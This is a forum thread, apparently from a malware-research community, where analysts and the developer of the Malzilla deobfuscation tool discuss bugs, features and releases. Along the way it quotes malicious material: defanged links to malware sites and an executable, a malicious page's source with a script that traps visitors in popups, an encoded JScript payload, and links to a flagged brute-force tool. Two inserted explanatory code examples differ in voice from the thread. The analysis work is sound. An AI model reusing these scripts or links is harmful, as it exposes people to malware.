I'm very excited about the tabs feature. :)
-
...just like I do not have time for my other ideas,
like using Malzilla as a scanner that would have signatures of various exploits,
or adding more standard DOM objects and functions etc...
...just thought that this mailing-list thread might be of some interest to you...'Obfuscated web pages':
http://seclists.org/focus-ids/2008/Feb/0016.html
-
Another weird bug for you... still testing with 0.921
The malware script on the URL below breaks malzilla:
hxxp://updatez.info/etc/count.php?o=22
It throws the following error and does not properly decode the script:
Malzilla
-------
Some violation occured
in SpiderMonkey engine
[ OK ]
The page is attached in case the URL gets taken down.
TJS
-
Hi TJS,
There is a trap (or bug) if you change or override eval() function.
The script will get stuck in a loop until it gets all the memory/buffers full.
I'll take a closer look at it this evening, after I get back from the job.
I can't decode it either as it uses document.createElement, and Malzilla does not have this DOM implemented.
Until then, use the following link to grab the exe file (got it from the debugger):
hxxp://updatez.info/etc/getexe.exe?o=1&t=1204173798&i=1416818079&e=1
Hi sowhat-x,
I'll take a look this evening. Thanks.
regards
bobby
-
Uploaded new snapshot:
http://sourceforge.net/project/showfiles.php?group_id=203466&package_id=242804
Please test and report suggestions/bugs
regards
bobby
-
Nice one :)
-
Hi Bobby...
Thanks for the new beta... looks like another solid release. I'm very excited about the tabs feature and it's great to see it coming to a reality!
I've found a bunch of bugs in 0.922 and have some suggestions. They are included below.
Thanks again, and keep up the great work!
-TJS
-----
BUGS
-----
default tab name numbering reuse
- Create new tab [New Tab (2)]
- Close first tab [New Tab (1)]
- Create new tab [expected: New Tab (3), actual: New Tab (2)]
'Decode' - 'Selection length' doesn't display selection length when selection occurs due to a 'Find' operation.
Tools: Numbered list Maker is buggy. It puts a random number of \n before the output. Also, if input contains a blank line then the number of \n in output is much larger... sometimes the output is blank. Never noticed this behavior before.
Inconsistent capitalization in tabs (examples - Numbered list Maker vs. Templated list maker, should M be caps or not?) [I know it's a silly bug]
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]
Putting & in a URL causes the char to get underlined in tab name (ex. h&ttp://blah.com causes t to get underlined [this is a Windows issue but you can escape it i think])
--------------
SUGGESTIONS
--------------
* CTRL-W to close tab
* Send to decoder to bring decoder window into focus (don't do this for append though)
* make tabs include the top tabs so that you don't need to worry about keeping decode tabs in sync with download tabs
* add a concatenate feature to misc decoders (too many times I see URLs that are split up with "ht"+"tp"+":/".. etc)
* download/debugger load from file (sometimes i want to just view a file locally without putting it on a webserver)
* download all (with referrer/proxy/cookie/user agent) on numbered list maker (i think everyone uses this for malware with names like 1.exe or loader1.exe) ;)
* option to disable URL history (i hate autocomplete.. it's good in real browsers, not so much here) :)
-
Hi TJS,
- default tab name numbering reuse - I'll need to think how to generate the tab numbers
- Decode > Selection length - I can't reproduce. Selection length is in next line under Find function here
- I think I just fixed Numbered list maker
- Capitalization - fixed
- Settings tab - will take a look the Align parameter of components, as I can't reproduce
- & in name - I can just filter this character out of the name. It can't be escaped
- CTRL-W - I do not have defined any keyboard shortcuts, will do it in the future for whole app
- Send to Decoder to bring focus - just to make it optional. It was set once, and it is annoying in a lot of cases
- include top tabs - will test that
- concatenate - not so trivial if one variable is concatenated in more than one line
- load from file - option exists, please take a look at right click menu
- Download all is present on Clipboard Monitor page. I'll need to re-think about inclusion of Clipboard Monitor in future versions, as it messes up the Clipboard.
- URL history - will be optional in future
Which screen resolution do you use?
regards
bobby
-
Settings tab, when maximized (on 1024x768) seems broken. The 'Clipboard monitor triggers' section covers most of the replace eval() section. [i can provide a screenshot if you want it]
Sorry, didn't see that you already mentioned the screen resolution. I saw what you mean.
I'll re-design Settings tab.
-
Another suggestion:
Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.
It would also be nice to have a 'Get to new tab' button in the download section.
Selection length repro:
* Get http://www.malwaredomainlist.com/ then copy/paste page source into decoder
* Search 'Malware', click 'Find'
* 'Malware' is selected, but selection length is 0
Download all in clipboard monitor page makes sense.. I'd still like to avoid having to use the clipboard monitor feature but that's easy enough to work around.
Thanks,
TJS
-
Hi TJS,
I'll make a checkbox for 'Use Referrer', null problemo.
Where you want exactly to have 'Get to new tab'? On Download tab? It does not make sense to me.
Or you mean on download section of Clipboard Monitor?
A question: at creating new tab in Download, should I take some parameters from current tab (User Agent etc.)?
Selection length problem:
It is calculated just if you select something by using mouse. It is triggered on onMouseUp event. Should I change this to work on Find too?
I have added right-click menu to Clipboard Monitor list, so you can paste links by hand. There is no need to keep the Clipboard Monitor running.
btw. Clipboard Monitor does not clear the clipboard anymore. This can lead to other issues, but we will see if this is better than clearing the clipboard.
I've also added right-click menu to Debugger's Variable State list, so one can Copy the data from there if the script does not compile.
-
bobby,saw this over at SourceForge,
and it reminded me somehow what was discussed earlier,
regarding the usability of the 'Hex" view...it's Delphi:
http://sourceforge.net/projects/httpbot
What are your thoughts on this...having Malzilla able to also work in proxy-mode at some moment?
This way someone could also interact directly with the sites in question via his/her browser if needed:
ie.actually have it exploited and also keep records of all actions that took place in the http session...
Not a request,as it is quite a bit of work obviously,just random thoughts regarding future ideas...
-
@sowhat-x
Well, I must admit that I can't manage to add more functionality to Malzilla :(
The existing code needs to be updated all the time because of new scripts which are using new obfuscation techniques, and I can barely manage to get some free time to do that (hope to find some normal job in a couple of months, with normal working times).
Next thing to do is to extend the PScript's functionality, and to work on concatenating variables (TJS' request).
Also, if I can get some help from JavaScript Bridge people (wrapper I use for SpiderMonkey, http://delphi.mozdev.org/ ), I would like to make step-by-step debugger.
Unfortunately, till now I didn't receive any useful help from them, and the debugger from the wrapper does not work if I set step-by-step option (Access violation).
Other things that also need attention are the complicated DOM things like document.createElement.
It is used a lot recently, and I still didn't get behind getting access violations when I try to manage it.
You will probably also want to take a look at Fiddler if you want to run malware on lamb-box:
http://www.fiddlertool.com/fiddler/
-
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
-
I agree 100% with what JohnC said...
wish I could actually give a bit of practical help;to be honest,
that's also the main reason I posted the few links to javascript-related blogs couple days ago,
just in case they provide you with a couple of new tricks/ideas or so...
Since it's still a 'one man's show'...patience,and everything will work out eventually... ;)
It's not possible to catch up with everything at once,daily life obligations and the rest:
as a guess in the wild,situation must also be quite 'tricky' at the moment there,
with the latest stuff taking place in the Balkan area...
let's just hope things don't get any worse/more complicated than what they currently are... :-\
And hey,I really mean it when I say 'not request,just random ideas',lol...
I have quite a few of http interceptors around here,perl/python stuff,
some of them I had also converted to standalone exes for use under machines without interpreters...
I'll have to dig my archives and submit them over at some moment during this month...
-
Nice idea about the right click stuff...
About the find length issue-- it's your project, and up to you. I just wanted to report it out because I want to help out in any way that I can :)
I'm not sure about the parameters issue.. I think that if you need the same referrer, then maybe it should remain in the same tab (in other words, don't persist referrer to new tabs) but usually proxy and user agent won't change when an analyst is going through multiple sites...
I agree with sowhat-x that these suggestions are only suggestions.. I don't want to dictate anything here :)
About the 'get to new tab' idea.. Let's say i'm looking at some site in tab (1) and i want to follow a url in a new tab, instead of opening a new tab and then pasting the url, how about letting me paste the url in tab (1) and click open in new tab or something like that.... i dunno, it's just an idea. In ffox/ie7 you can do a control-click on a URL to open it in a new tab- that would be HOT. :)
TJS
-
MalZilla is a good project and open source. It is a shame that nobody is able to help you with development, it would give you more time.
I'd have offered help when he first started developing it but I don't know Delphi .... :( (hoping to find some time to learn both Delphi and Ruby within the next 12 months - don't have much of it free)
-
This page is using decode64() in conjunction with unescape().. Am I doing something wrong or is the decode section in malzilla unable to iterate through decode64()?
Example (live malware):
hxxp://radt.info/?0a2V5d29yZD1Xd3crTWF0dXJlK1ZpcA==
TJS
Attached in case the URL 404s.
-
Decoded just* fine with Malzilla?
*typo correction
<html>
<head>
<title>Www Mature Vip</title>
<meta name="robots" CONTENT="noindex, nofollow, noarchive">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script language="javascript" src="/d.js"></script>
<script language="javascript">
var enter_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
var exit_url = "http://clipsuniverse.com/movie1.php?id=1018&n=pornstars";
</script>
<script language="jscript.encode" src="/pop31.js"></script>
</head>
<body onunload="entrapment(0)" bottommargin="0" leftmargin="0" marginheight="0" marginwidth="0" rightmargin="0" topmargin="0">
<script language="javascript">
var sts = "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";
document.write(unescape(decode64(sts)));
</script>
<script src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></script>
<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=pornstars" width="100%" height="1500" scrolling="no" frameborder="0"></iframe>
<script language="jscript.encode" src="/pop32.js"></script>
</body>
</html>
<script type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></script><noscript><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscript>
The decode64 function is held in a separate JS file, so you'd need to copy it over first;
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/d.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:26:02:26
*****************************************************************
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + //all caps
    "abcdefghijklmnopqrstuvwxyz" + //all lowercase
    "0123456789+/="; // all numbers plus +/=
//Heres the decode function
function decode64(inp)
{
    var out = ""; //This is the output
    var chr1, chr2, chr3 = ""; //These are the 3 decoded bytes
    var enc1, enc2, enc3, enc4 = ""; //These are the 4 bytes to be decoded
    var i = 0; //Position counter
    // remove all characters that are not A-Z, a-z, 0-9, +, /, or =
    var base64test = /[^A-Za-z0-9\+\/\=]/g;
    if (base64test.exec(inp)) { //Do some error checking
        alert("There were invalid base64 characters in the input text.\n" +
            "Valid base64 characters are A-Z, a-z, 0-9, '+', '/', and '='\n" +
            "Expect errors in decoding.");
    }
    inp = inp.replace(/[^A-Za-z0-9\+\/\=]/g, "");
    do { //Here's the decode loop.
        //Grab 4 bytes of encoded content.
        enc1 = keyStr.indexOf(inp.charAt(i++));
        enc2 = keyStr.indexOf(inp.charAt(i++));
        enc3 = keyStr.indexOf(inp.charAt(i++));
        enc4 = keyStr.indexOf(inp.charAt(i++));
        //Heres the decode part. There's really only one way to do it.
        chr1 = (enc1 << 2) | (enc2 >> 4);
        chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
        chr3 = ((enc3 & 3) << 6) | enc4;
        //Start to output decoded content
        out = out + String.fromCharCode(chr1);
        if (enc3 != 64) {
            out = out + String.fromCharCode(chr2);
        }
        if (enc4 != 64) {
            out = out + String.fromCharCode(chr3);
        }
        //now clean out the variables used
        chr1 = chr2 = chr3 = "";
        enc1 = enc2 = enc3 = enc4 = "";
    } while (i < inp.length); //finish off the loop
    //Now return the decoded values.
    return out;
}
-
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/pop32.js
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:28:10:28
*****************************************************************
#@~^cgMAAA==r6Pc6bY{!D^Z'rJbP9W^;s+xD hMkYcE@!K4NJQJn^DPrN{^W,hr[Dt'T~4+ro4O{!~1Vm/J3JkrN{B/SUJQE&f)+$J3Jsl+)*yO2,E_E*zOqFGfO~FEQr*&RTZZE_rTWs{OszbvE@*@!&W(LE_r+^O@*J#p~k6P`UO+M{!Ds"xEr#~NK^Es+UOchDrO`E@!K8NJQr+1YP1Vmd/bNxB1Vdr9)Ny{m94vRC++N FqmWROv8% *cW*Xflc!TTZB~mK[4Ck+{BtDYalzJNGh VGC9R:m^DK:+9rCR1Wsz2E8&ktGm0Al7+&^m4/&W^ldtJdS0sm/4Rmm4[-+M/rW '{SZ~!BTB,hk9O4'EFEP4+rL4YxB8vPmVrL 'Bhr9Ns+E@*r_E@!wmDJ3JmhP lh+{BCs^WhU^DbwYz^^+k/EP-ls;'v/mh+GWhCbxB~&@*JQJ@!2mDE3Jm:P lsn'E:G\b+v~7lV!n'EwWaf /S0Qj.VxE3+UY.{!DsQrBP&@*r_E@!aCMJQrlsPxm:xB$ECVbYzv,\l^;+{BtbL4B,z@*@!2l.CsP~xmh+{B8L1WVG.EP-l^;'v[060060E~z@*JQJ@!+hE3J4[PkDm{v2Wa&c/A0_iMVxJ3nxD+.m!DVQEEP5EmsbYz{B4ko4B,8o1WsWM'v:6006W0EPhb[Ot{B8B~tnrTtO'EqB,xCh'B2.K:vPmsboU{BskN9VvPmVsWS?^.bwYz^m//{vdls+GWhlrUEPOXan'El22^kmCObWUzXRktG13Sl\O6slktvPaV;Lbx/aCo'B4OOw=zJhAh hmm.WsnNbl ^K:zLGJonY6sm/4aVmX+MB,&@*r_E@!JW8%r_J^Y@*J#p5xUBAA==^#~@
*****************************************************************
vURL Desktop Edition v0.2.7 Results
Source code for: http://radt.info/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip
Server IP: 75.125.208.243 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Checked
Date: 04 March 2008
Time: 02:29:49:29
*****************************************************************
var noentrap = 0;
function entrapment(entcount) {
if (noentrap) return true;
entcount++;
document.open();
document.write('<html><head><title>Www Mature Vip</title><style type="text/css"><!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --></style></head><body onunload="entrapment(' + entcount + ')">' +
'<scr' + 'ipt src="/aHR0cDovL3B1dGl0YXMtY.php?service=none&key=Www%20Mature%20Vip"></scr' + 'ipt><scr' + 'ipt type="text/javascript" src="http://radt.info/phpstats/php-stats.js.php"></scr' + 'ipt><noscr' + 'ipt><img src="http://radt.info/phpstats/php-stats.php" border="0" alt=""></noscr' + 'ipt>' +
'<iframe src="http://clipsuniverse.com/movie1.php?id=1018&n=celebs" width="100%" height="1500" scrolling="no" frameborder="0"></iframe>');
document.close();
}
-
This one uses the jscript.decode function in the script tag, so Malzilla couldn't decode this one unfortunately;
Decoder for jscript.encode is on Misc Decoders tab (Decode JS.encode).
-
Ah right hehe ...... I'd forgotten about that :-[
-
Ah right hehe ...... I'd forgotten about that :-[
Not your guilt, I'm the one who does not have enough time to document all the functions.
@TJS
Just to let you know that "concatenate" function is implemented :)
-
woot! :)
-
0.9.3pre3 (0.9.2.3) uploaded to SourceForge one minute ago.
I do not know how much time will take until all the mirrors gets updated, but I hope in a couple of hours it should be available for download.
-
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?
Thanks for the new release!
TJS
-
Another suggestion-- can we get 'format text' to work on page content (in 'download' tab)?
Thanks for the new release!
TJS
Format text is gone (with the wind).
It was useless...
It added a line-break after every semi-colon, and that does damage in a lot of cases.
I will search for a better tokenizer for formatting text, but as for now I have none that is working like it should.
-
Another suggestion:
Can you add a checkbox for 'Use Referrer' because sometimes I don't want to use one. Also, I don't like how when I put a new URL it keeps the old Referrer... I understand how this is useful, but I would prefer if when I try to malzilla a new URL it uses the new URL as the referrer or leaves it blank by default.
....
Thanks,
TJS
Isn't un-checking Auto-set referrer on Settings tab exactly that what you need?
-
Two responses:
Format text is _NOT_ useless! I use it almost every single time I analyze a malware page. Please don't remove it otherwise I'll be hacking at your source and recompiling a private build for myself with it. I think even in its limited form it is a great feature to improve readability of scripts.
Referrer settings on the download tab is better because, like using a useragent/cookies/proxy sometimes you want it and sometimes you dont. In most cases, I don't particularly because i usually analyze many sites at the same time which causes me to 'share' the last site I looked at with the current one via referrer. I'm cool with having it on the settings page, but in that case, why not move the proxy, user agent and cookies options there too?
TJS
-
I vote to restore the format code option too :)
-
(http://img364.imageshack.us/img364/9845/gonewiththewindpg4.png)
Rotflmao... ;D
Ok,seriously now...
If it's not much trouble,I also vote for it to be re-included...
-
Hi guys,
The code for that Format text was something like:
if you see a semi-colon, replace it with semi-colon + line break.
Translated to Pascal, that is exactly one line of code.
It is not a problem to bring it back, but that rule for inserting line breaks is simply wrong.
One should take care of tokens, and put a line break only if the semi-colon is the end of a token.
Biggest problem was that, if you click it 2-3 times, your text will end with a bunch of line breaks one after another.
I will really search for better solution. It should not be far away. I just need to study the code of the highlighter I'm using there - the highlighter does know where the end of tokens are.
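The token rule described in the post above, as an added example (it is not Malzilla's Pascal code or its highlighter): `naiveFormat` is the one-line semicolon replace, and `formatCode` is a hypothetical scanner that breaks only after statement-ending semicolons. It assumes no regex literals in the input; the sample script is constructed.

```javascript
// The rule as first shipped: break after every semicolon, wherever it sits.
function naiveFormat(src) {
  return src.replace(/;/g, ';\n');
}

// Token-aware version: string literals and comments are copied verbatim,
// semicolons inside parentheses (for(;;) headers) are left alone, and any
// whitespace already following a semicolon is replaced by exactly one line
// break, so repeated clicks do not pile up blank lines.
function formatCode(src) {
  let out = '';
  let depth = 0;   // number of currently open "("
  let i = 0;
  while (i < src.length) {
    const c = src[i];
    const next = src[i + 1];
    let end = -1;  // end offset when a whole token is copied unchanged
    if (c === '"' || c === "'") {
      end = i + 1;
      while (end < src.length && src[end] !== c) {
        end += src[end] === '\\' ? 2 : 1;   // skip escaped characters
      }
      end += 1;                             // include the closing quote
    } else if (c === '/' && next === '/') {
      end = src.indexOf('\n', i);
      if (end === -1) end = src.length;
    } else if (c === '/' && next === '*') {
      end = src.indexOf('*/', i + 2);
      end = end === -1 ? src.length : end + 2;
    }
    if (end !== -1) {
      out += src.slice(i, end);
      i = end;
      continue;
    }
    if (c === '(') depth++;
    else if (c === ')' && depth > 0) depth--;
    out += c;
    i++;
    if (c === ';' && depth === 0) {
      while (i < src.length && /\s/.test(src[i])) i++;  // drop old whitespace
      if (i < src.length) out += '\n';
    }
  }
  return out;
}

// Constructed sample: a semicolon inside a string and a for(;;) header.
const FORMAT_SAMPLE = 'var u="a;b";for(var i=0;i<3;i++){x+=u;}eval(x);';

console.log(formatCode(FORMAT_SAMPLE));
```

The naive rule splits the string literal `"a;b"` across two lines, which changes a script from working to a syntax error before it ever reaches the decoder.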
-
hehe no worries :)
Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
-
hehe no worries :)
Btw, did you see the code I posted in the Blenders latest thread at MR? (Malzilla couldn't work with it)
That code is full of references to DOM objects that Malzilla does not support.
After removing some of the references, I've managed to get it decoded.
btw. This page is protected by unregistered version of Right HTML Protector
-
Oh right, hehe
-
Le Format Text Est Mort, Vive Le Format Code!
Who wants to play with new formatting?
http://malzilla.sourceforge.net/test/
Pick the new exe (you already have the DLLs from previous downloads). There is new formatting for Decode tab.
I'll test tomorrow how well it works with HTML code, to see how to deal with Download tab code formatting.
Please test, and tell me if it works well or bad for you.
Take into account that the formatting can break some code from executing (code checking for function length).
-
Seems to work perfectly :) ......
-
New upload to http://malzilla.sourceforge.net/test/
(overwritten the previous upload)
Please test:
Ctrl + Send to Decoder
Ctrl + Send all to Decoder
Format code on Download tab
-
Works perfectly here :)
-
Just to let you know that now we have a very own hacked version of SpiderMonkey that will let us decode these scripts where we used debugger to see the downloading link for EXE. See the bug report from TJS here: http://www.malwaredomainlist.com/forums/index.php?topic=218.msg2225#msg2225
The process is time-consuming (1-2 minutes for the script attached by TJS), but at the end you will have the source code of the exploit :)
Will upload a new version as soon as I implement this feature in the GUI.
I can't promise that I'll do this in the next few days, so if someone needs this feature urgently I can upload the hacked SpiderMonkey and the instructions on how to use manually this feature.
Happy hacking ;)
-
Idea that came to mind while digging through stuff locally...
Both 'Cookies' and 'Links Parser' extraction are obviously already there....
what about a 'Forms' extraction tab maybe? ::)
I've also have a couple of Delphi sources archived here,
meant exactly for this feature/capability... ;)
-
Hi sowhat-x,
Any examples of files with Forms that would need to be extracted?
I'm not some HTML guru, so I would need a couple of examples to see what needs to be done.
If it is a tag, Malzilla already has a tag extraction engine, I just need to tell it to extract this one too.
Please, write your suggestions here.
Day after tomorrow I'll have some time in the evening to code, so if anyone have a suggestion - please write it before that.
-
Standard code for forms is;
<form name="{VALUE}" action="{FILE}" method="{POST_OR_GET}">
{FIELDS}
</form>
Where {FIELDS} is typically one or more of the following;
<input type="text" ....>
<input type="hidden" ...>
<input type="checkbox" ....>
<input type="password" ....>
<input type="radio" .....>
<textarea .....>
<select ....>
The spec is available at;
http://www.w3.org/TR/html4/interact/forms.html
The spec mentions the use of LABEL for the field names;
<FORM action="http://somesite.com/prog/adduser" method="post">
<P>
<LABEL for="firstname">First name: </LABEL>
<INPUT type="text" id="firstname"><BR>
<LABEL for="lastname">Last name: </LABEL>
<INPUT type="text" id="lastname"><BR>
<LABEL for="email">email: </LABEL>
<INPUT type="text" id="email"><BR>
<INPUT type="radio" name="sex" value="Male"> Male<BR>
<INPUT type="radio" name="sex" value="Female"> Female<BR>
<INPUT type="submit" value="Send"> <INPUT type="reset">
</P>
</FORM>
... but I've never seen anyone use that ..... typically people use td's to separate these, for example;
<form action="{file}" name="{VALUE}" method="{GET_OR_POST}">
<table>
<tr><td>Name:</td><td><input type="{TYPE}"></td></tr>
</table>
</form>
-
Ah, I got it now, thanks MysteryFCM.
I didn't realize it is about POST forms (thats what I call them, probably wrong but...)
@sowhat-x
Problem is, I don't get it what I should extract here?
You want me to render the form, so you can enter values and send the form data?
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.
-
Malzilla intentionally does not have any rendering engine. That way it can stay away of being exploited in the same manner like browsers are exploited.
Same reason vURL DE doesn't :)
-
...MysteryFCM was way faster than me in replying,he-he...
yes,it's 'post' forms I was talking about,and actually,
I was afraid of the term being confused with...Delphi 'forms' themselves,lol... :)
Have a look at this python app called 'twill" for example,
among other things,the 'showforms' command can give the very exact idea of it:
http://twill.idyll.org/
Being able to fill in/send 'post' data is not of that much interest I guess,
it's not 'web application' testing after all...I mean,I have never seen some kind of infected page,
that 'rotates'/pushes different exploits and malware,depending on user's input on post forms...
Maybe others more experienced have,I certainly haven't though...brrr...nasty thought...
Simply listing them though,separated from the rest of the html code,would be quite nice...
ie.to have a more 'clean' idea of the html's structure...
-
I did see some web sites that required POST data to get the process to continue.
In one such case I have worked together with MysteryFCM :)
The fact is, in last two years I have probably seen some 5 such cases.
Some kind of POST editor does exist on my ToDo list for Malzilla, but I didn't give it any priority and I do not have a clear picture how it should look like.
I still do not have a clear picture what a form tab should show to the user...
List of forms (do every form in HTML have a unique identifier if more than one form is on the page)?
Separate tab for every form found which would show the code of that form?
-
...or another one that came to mind,a really older vb-coded app,
that was called 'Form Scalpel'...it is still available from PacketStorm's repository:
http://packetstormsecurity.org/web/index2.html
Honestly though,don't really bother yourself much with it,
as this is something that simply helps in reading/breaking down the html structure,
ie.it certainly doesn't help in making the malware scripts themselves more 'readable' in any way...
I still do not have a clear picture what a form tab should show to the user...
Something somewhat similar to 'Judas' that I posted today in the forum,
or say like 'Form' came to mind...want me to upload somewhere else instead of Rapidshare?
-
Bobby,
Generally speaking, the form tag will include either "name", "id" or both (e.g. name="{NAME}" or id="{ID}"). However, as nested forms are very rare, it's generally just a case of parsing out everything between the opening and closing form tags (and where more than one form is present, then processing the second, third whatever form).
I'm not sure about Delphi, but with MS XML, it's simply a case of identifying which method it expects (GET or POST), then identifying the fields it is expecting (including the hidden ones), then sending the data it's expecting via an XML request.
To have this in Malzilla would probably be best by doing the following;
1. ID the form and its action value
2. ID the fields within the form
3. Provide a string builder for the fields the form expects
Obviously it'll not be as simple as I've made it sound, but it's just a thought :)
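The three steps listed above, done statically with no rendering, as an added example (not Malzilla's tag extraction engine and not twill's code): `listForms`, `parseAttrs` and `buildQuery` are hypothetical names, the HTML is a constructed sample, and the regex scan assumes attribute values contain no `>` and forms are not nested.

```javascript
// Parse name="v", name='v' or name=v pairs out of a tag's attribute text.
function parseAttrs(text) {
  const attrs = {};
  const re = /([a-zA-Z_:][-\w:.]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  }
  return attrs;
}

// Steps 1 and 2: identify each form, its action and method, and its fields.
function listForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form\s*>/gi;
  let f;
  while ((f = formRe.exec(html)) !== null) {
    const a = parseAttrs(f[1]);
    const fields = [];
    const fieldRe = /<(input|textarea|select)\b([^>]*)>/gi;
    let t;
    while ((t = fieldRe.exec(f[2])) !== null) {
      const fa = parseAttrs(t[2]);
      const tag = t[1].toLowerCase();
      fields.push({
        tag,
        type: tag === 'input' ? (fa.type || 'text').toLowerCase() : tag,
        name: fa.name || '',   // only named fields are submitted
        id: fa.id || '',
        value: fa.value || '',
      });
    }
    forms.push({
      name: a.name || a.id || '(form #' + (forms.length + 1) + ')',
      action: a.action || '',
      method: (a.method || 'GET').toUpperCase(),  // HTML default is GET
      fields,
    });
  }
  return forms;
}

// Step 3: a string builder for the fields the form expects, hidden ones
// included. Buttons are skipped and a radio group contributes one value.
function buildQuery(form) {
  const params = new URLSearchParams();
  const radioGroups = new Set();
  for (const fld of form.fields) {
    if (!fld.name) continue;
    if (['submit', 'reset', 'button', 'image'].includes(fld.type)) continue;
    if (fld.type === 'radio') {
      if (radioGroups.has(fld.name)) continue;
      radioGroups.add(fld.name);
    }
    params.append(fld.name, fld.value);
  }
  return params.toString();
}

// Constructed sample page with two forms, one of them using unquoted attributes.
const FORM_SAMPLE = `
<form name="login" action="/check.php" method="post">
<input type="hidden" name="sid" value="abc123">
<table><tr><td>Name:</td><td><input type="text" name="user"></td></tr></table>
<INPUT type="radio" name="sex" value="Male"> <INPUT type="radio" name="sex" value="Female">
<textarea name="note"></textarea>
<input type="submit" value="Send">
</form>
<FORM action=search.php><select name=q></select></FORM>`;

for (const form of listForms(FORM_SAMPLE)) {
  console.log(form.name, form.method, form.action, '->', buildQuery(form));
}
```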
-
...quickly uploaded both 'Form' and 'Judas' to Googlepages as well,
password is simply 'password',without quotes...
http://sowhatx.googlepages.com/FormFinal.rar
http://sowhatx.googlepages.com/Judas.rar
Note that some AV products flag 'Form' as a 'Hacktool',
since it was meant for bruteforcing html pages,he-he... :D
Edit:Uploaded 'Form Scalpel' as well,same password...
(the extra vb dlls might need regsvr32 first):
http://sowhatx.googlepages.com/FormScalpel.rar
-
Sorry for the late reply... I was pretty busy last couple of days.
New Malzilla uploaded:
https://sourceforge.net/project/showfiles.php?group_id=203466
We are now using hacked SpiderMonkey.
Please also take a look at the new tutorials.
@sowhat-x
Thanks for the uploads. Got them all ;)
-
Nice one cheers :)
-
Heh,compared with earlier v0.91/v0.92 builds,it's miles ahead... ;D
...made a single pdf from the first 3 Malzilla's tutorials for 'offline' usage:
now why would anyone need them if being offline in the first place,
that's something beyond my imagination,he-he...but anyway... :D
http://rapidshare.com/files/102201005/MalzillaIntro.pdf.html
Alternatively:
http://www.megaupload.com/?d=IFMPWEVK
Wasn't really sure on how to handle the scripts in the newest two documents:
on the one hand,I couldn't get them to properly fit as 'static' printed images,
and I also didn't really like the idea of handling them as pdf 'attachments'.
I preferred to leave them out for the time being,if any other suggestions/ideas arise...
P.S:...ehmm...felt a bit embarrassed...i mean,regarding the 'about' box:
as it's JohnC that's doing all the 'real'/hard work...
-
Just got some time to look at the tutorials too and they're great dude :) (good to see the code I had problems with in there too as it may have confused others too :-[).
-
Great stuff!
When you use malzilla on dual monitors, and malzilla is in focus on the secondary monitor the splash screen stays on top on the primary monitor.
-
@MysteryFCM
There is no offense meant by putting your script there under such title. It is just so that you found an extraordinary example.
Breaking the unicode sequences in a such way like in your script - I didn't see anything like that before, and I'm really happy that you found it.
It was a reason to add concatenating function to Malzilla and a good lesson (for me) that one must not forget to take a look at some simple things, not always searching for clues in some complicated functions.
I tried to blog about some interesting "species", but Blogspot is a real PITA when it comes to text formatting:
http://malzilla.blogspot.com/
I gave up on that blog.
@sowhat-x
Do not undervalue your contribution to Malzilla and to this discussion.
I do not have a lot of feedback on Malzilla, and I appreciate every single post here. That gives me some motivation to work further.
Apart of this thread here, there is one more guy posting in forum provided by SourceForge, one contact per email (asking for Linux version which I promised to finish, but never got time to get it to the same level like Windows version) and some feedback on Ethical Hacker Network.
So, I appreciate your feedback a lot.
@TJS
I got some other reports on strange behavior of that splash screen (try Alt + Tab on single monitor).
I'll probably remove it from the next upload, as I really can't find whats wrong, as the code looks OK.
@all
Does the new handling of eval() function do a better job for you than previous hacks?
-
* I havent had any issues with the new eval() handling.
* I suggest that you put an option to not display splash screen instead of removing it (this seems to be a standard in software today).. that way you can still have a splash :)
TJS
-
@TJS
Try the script from Tutorial 5 on Malzilla's website to see the power of the new eval() handling.
After that, try the same script with older versions (pre-release 3) if you still have them (I've deleted them from the server).
In older releases you could only get some info by taking a look at the variables in debugger.
With new version you will get the complete script :)
-
Very nice!!
Does this introduce any additional security risk? I'll buy beer for anyone that finds a way to get malzilla to execute a payload using some scripting magic and discloses it to bobby in a responsible manner.
Another crazy suggestion:
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.
8)
TJS
-
How about a scripting API so that I can start using malzilla in an automated way against a list of URLs? Perhaps to be able to input a list of URLs and have malzilla automatically deobfuscate each one until certain conditions are met (ex. till a string [.exe|GET|etc] is found, or after n iterations) while writing each 'layer' to disk.
